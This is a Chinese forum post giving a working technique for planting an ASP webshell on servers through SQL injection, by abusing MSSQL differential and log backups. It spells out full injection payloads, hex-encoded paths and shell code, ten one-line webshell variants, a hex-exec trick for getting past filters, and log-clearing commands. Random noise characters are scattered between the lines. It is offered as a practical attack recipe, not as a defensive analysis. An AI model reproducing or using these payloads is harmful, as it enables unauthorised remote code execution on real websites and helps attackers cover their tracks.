MSsql差异备份总结

admin

差异备份的流程大概这样：
/ ]* [! O# e7 W, s1.完整备份一次(保存位置当然可以改)
  d, ]. X) I3 ebackup database 库名 to disk = 'c:\ddd.bak';--

0 y0 k+ t( k1 b- H! n$ l  v, O2.创建表并插曲入数据
6 e1 s7 G4 \1 Qcreate table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
; I9 l* Z. F; K' @9 t1 F* @  |$ `
3.进行差异备份
: V( ]3 ~4 z- e3 a7 c) Lbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
$ a1 T) D6 }7 [5 s- X, b: j& A
* x- e) m, q0 Y( H6 ^0 k上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
6 Y; H! l3 D' J
& ^& k4 n8 d4 N' V" o# _; k/ u如下是网上常见的差异备份代码，思路一样！
- d* y% n! M) k" Z5 P0 w===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

- k  P% H! y4 w3 Q3 t4 |create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
' o& W, c% w5 [# v

- r! C& e: H, einsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

1 F1 Y. N; v+ k4 `4 c: o8 Ldrop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

声明：方法不是我想的，我只是写工具，默认得到shell是
6 V$ _( g! M. R8 g0 M# ?; y* K<%execute(request("a"))%>
* E( j$ c7 D# p1 f8 x- V' ?: {/ H===============================================================
6 d% z! H$ V6 {# }) k% h& u
我发现上面代码，有时会无效，而直接用
3 e5 ]( E$ t' {) n0 Z- L3 W1 b) N# r
" D! a4 K' ]) ]$ j' Dbackup database 库名 to disk = 'c:\ddd.bak'

* K* O& g4 x# w2 dcreate table [dbo].[dtest] ([cmd] [image]);

insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

网上还有log增量备份的，我也把他记录一下
=====================================================
9 X9 ?' M1 I5 @! i0 k9 |" H另一种log增量备份技术:
0 k& t: _" q* N+ r5 ]% g
/ H' i! }8 H& c" f';alter database null set RECOVERY FULL--

$ M5 D4 T$ N4 V- x) c';create table cmd (a image)--
# _; l% @  P8 V
: u/ z2 Y2 z; X* I. v  H';backup log null to disk = 'f:\cmd' with init--
/ n$ K5 f3 I0 ?- `- Y) h8 l
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
7 Q; O" d- e  Q; L$ g4 O
) G0 W* x! Y/ [& u; e';backup log null to disk = '备份路径'--

/ ]3 ]9 y- F2 N';drop table cmd--
9 E! M6 R, E( o0 x3 }- W
6 m' k  P, w. r4 V* j2 P';alter database XXX set RECOVERY SIMPLE--
/ m+ W( T8 Y8 O( S
PS:0x3C2565786563757465287265717565737428226122292
2 p5 ~+ V4 M3 H( W2 L9253EDA 是一句话小马16进制转来的

2 v8 s1 Y+ I8 Q3 j2 n0 ~+ l说到一句话马，还可以有这么几种写法：
& K5 @% R1 R) z' _! Q6 |' C" F
9 U8 i+ u, C. j9 ]a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
- u& Y3 K6 x  ]# S: U- yf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
) y4 H9 U8 I' f5 M, lh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
" ^4 L6 K1 Q2 g& ^* q, N4 jI)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
/ e* x+ X# `6 H) @
7 b1 J0 k4 x3 s1 z=============================================

8 v) j. v) t2 @( r$ M& |当遇到差备过滤了/时用这个语句代替
0 H! \. ^+ h( K; K( m! i3 B5 t
( u$ k3 s0 I- rdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

: `3 }3 I- q0 S/ l' A& v把要执行的语句转16进制然后用exec执行


9 ]9 c0 d9 q2 T/ [. j0 H7 J4 Q$ b9 F减少备份文件大小方法如下:
6 N! T# S' F" f! L7 F8 d7 l* N& u; |1 X
总的来说就是那么简单几句,下面以备份数据库model为例子
1
+ l, [; \0 k! m% P% Iid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
* k+ z% o7 U. U- D3 yid=1;backup database model to disk='你的路径‘ with differential,format;--

0 U( g, n" E2 h, T; ]3 ?: o

SQL语句清理日志
注：test为数据库名
( Z. E4 e/ a) ^; d7 v  z
, O$ ~! o0 \: m  m--清空日志
DUMP TRANSACTION test WITH NO_LOG
6 E$ {0 r& q( D6 Y& {3 X
  [* M- w1 m# r# [0 Y  ^1 C/ a--截断事务日志
+ A( p! f4 i' z) P( \2 q5 K* w) N+ rBACKUP LOG test WITH NO_LOG

--收缩数据库
5 T; l% s) j* d3 P2 |! |DBCC SHRINKDATABASE(test)
. \7 v/ A4 F5 m0 A1 b! I
--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)

$ O8 f3 [8 @- U: g# ?4 i--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'